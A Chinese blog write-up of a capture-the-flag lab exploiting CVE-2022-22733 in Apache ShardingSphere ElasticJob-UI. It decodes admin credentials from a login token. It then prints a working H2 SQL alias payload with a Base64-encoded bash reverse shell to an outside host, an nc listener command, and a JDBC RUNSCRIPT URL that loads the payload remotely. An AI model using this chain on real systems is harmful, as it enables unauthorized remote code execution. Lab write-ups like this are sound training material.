【春秋云境】CVE-2022-22733靶场WP

最新推荐文章于 2024-04-14 21:42:47 发布
最新推荐文章于 2024-04-14 21:42:47 发布
阅读量1.4k 收藏 2
点赞数 1
分类专栏: 春秋云镜 文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46029520/article/details/128222905
版权

【春秋云境】CVE-2022-22733靶场WP

网站地址:https://yunjing.ichunqiu.com/

渗透测试

1.已知提示
  • Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
2.开启靶场

请添加图片描述

3.使用burpsuite抓包

  • 输入账号密码guest:guest,使用BP抓包会返回access Token

    请添加图片描述

4.解密获得root密码

  • 将返回的Token进行Base64解码,得到用户名密码均为root

    请添加图片描述

5.构造恶意代码

  • 构造恶意代码

    CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==}|{base64,-d}|{bash,-i}')

    其中只需要修改YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNDguOTYuMTAwLzEyMzQgMD4mMQ==,这段命令为bash -i >& /dev/tcp/ip/port 0>&1的base64编码

6.上传恶意文件

  • 将恶意代码保存为glc.sql,并在本地开启一个web服务,根据自己的python版本决定

    python2 -m SimpleHTTPServer 9999
或者
python3 -m http.server 9999

    请添加图片描述

7.开启监听端口

  • 在本地开机监听

    nc -lnvp 1234

    请添加图片描述

8.反弹shell

  • 使用root:root登录页面,点击Event trace data source—>ADD,url处填写jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://ip:port/glc.sql',其余信息随便填,然后点击Confirm,成功反弹shell

    请添加图片描述

  • 执行命令获得flag

    请添加图片描述

果粒程1122
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
介绍如何 利用 CVE-2022-4230 的 WP Statistics WordPress 插件13.2.9 漏洞利用。 漏洞描述:WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认...
spring_cloud_rce(CVE-2022-22947)漏洞复现
3tefanie丶zhou的博客
03-19 5319
【自己觉得不好的事情,就干脆不要有第一次,一次也不要做,一小步也不能走出去,要不然回头来看,吃亏吃苦的还是自己。】
[春秋云镜]CVE-2022-22733
niubi707的博客
12-04 6099
春秋云镜CVE-2022-22733Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
春秋云镜】CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2078
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version<3.0.3 3.1.1<Apache spark 版本<3.1.2 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: https://spark.apache.org/downloads.html 2.安全设备路径添加黑名单或者增加WAF规则(临时方案)。
春秋云镜靶场挑战——Tsclient
Cobra的博客
03-25 2379
目标IP:39.98.73.212 网络拓扑 入口机器 1、使用namp对目标IP进行扫描,发现目标开放了1433端口(MSSQL服务),3389端口(RDP服务) 2、可以先爆破MSSQL服务,如下可以看出成爆破出密码 3、使用MDUT工具连接Mssql 4、使用xp_cmdshell执行命令发现只有一个比较地低的权限 5、使用CS生成木马,利用MDUT上传木马 6、执行木马上线CS C:/Users/Public/beacon.exe 7、使用土豆提
7z apache解析漏洞_「安全通报」Apache ShardingSphere远程代码执行漏洞
weixin_35939140的博客
01-06 151
转载:nosec 作者:iso60001近日,白帽汇安全研究院发现网络中公布了影响Apache ShardingSphere的高危漏洞,由奇安信的国内安全研究人员发现的。Apache ShardingSphere是一套开源的分布式数据库中间件解决方案组成的生态圈,它由Sharding-JDBC、Sharding-Proxy和Sharding-Sidecar这3款相互独立,却又能够混合部署配合使用的...
春秋云镜 CVE-2022-22733
qq_22002773的博客
07-20 483
春秋云镜 CVE-2022-22733
CVE-2022-22733
最新发布
sinat_25635183的博客
04-14 751
如果来到这里没有任何头绪的,可以回到漏洞的介绍那里,提到了,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。2、通过BP的抓包发现,在响应信息里出现了Token,根据前面漏洞得知,在Token中是包含有管理员的密码,因此,可以尝试破解密文。3、base64解码的方法有很多,这里尝试了两种,这一种是利用在线的工具进行解码,这类型的网站一大堆,可以根据个人的喜好进行选择;总之,渗透测试是一项高度专业和敏感的活动,必须由经验丰富的专业人士在合适的环境和条件下进行。
CVE-2022-22733漏洞复现】
SwBack的博客
01-21 709
Apache ShardingSphere ElasticJob-UI由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。
春秋云境CVE-2021-34257靶场记录
2301_78019493的博客
05-19 883
WPanel是一个用于构建博客、网站和网络应用程序的CMS。WPanel 4 4.3.1 及更低版本存在安全漏洞,该漏洞源于通过恶意 PHP 文件上传
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
CVE-2022-22965 GUItools单个图形化利用工具
04-06
CVE-2010-1622中曾出现由于参数自动绑定机制导致的问题, 此前通过黑名单的方式修复了该漏洞,但是 JDK9之后引入了 Module,使得可以通过 getModule 绕过前者的黑名单限制,最后导致远程代码执行。
WP-春秋云镜-Brute4Road靶场通关完全指南
qq_45234543的博客
12-30 2486
春秋云镜-Brute4Road靶场通关指南,完全通关指南手把手教学
2022-安询杯-复盘
Luodehahajiang的博客
01-06 300
该漏洞是由于返回 token 中包含了管理员密码,攻击者可利用该漏洞在授权的情况下,构造恶意数据执行权限绕过攻击,最终获取服务器最高权限。导出HTTP对象后,按大小排序,发现一个secret.zip,导出来。压缩包里有625张黑白照片,25*25,一个二维码。官方wp给的复现CVE-2022-22733漏洞。将二进制文件转为十六进制,再保存为压缩包。html直接用wbstego4解密。base64解密得到管理员密码。里面是一个html,需要密码。
WP-春秋云镜-Unauthorized靶场完全通关指南
qq_45234543的博客
11-23 1345
Unauthorized靶场完全通关指南,手把手教学拿到3个flag
春秋云境CVE-2022-23134靶场WPCVE-2022-22965靶场WP
果粒程
12-05 921
春秋云境CVE-2022-23134靶场WPCVE-2022-22965靶场WP
春秋云境CVE-2022-29464
09-05
- *2* [春秋云境靶场 WSO2文件上传漏洞(CVE-2022-29464)](https://blog.csdn.net/qq_52923396/article/details/131832217)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值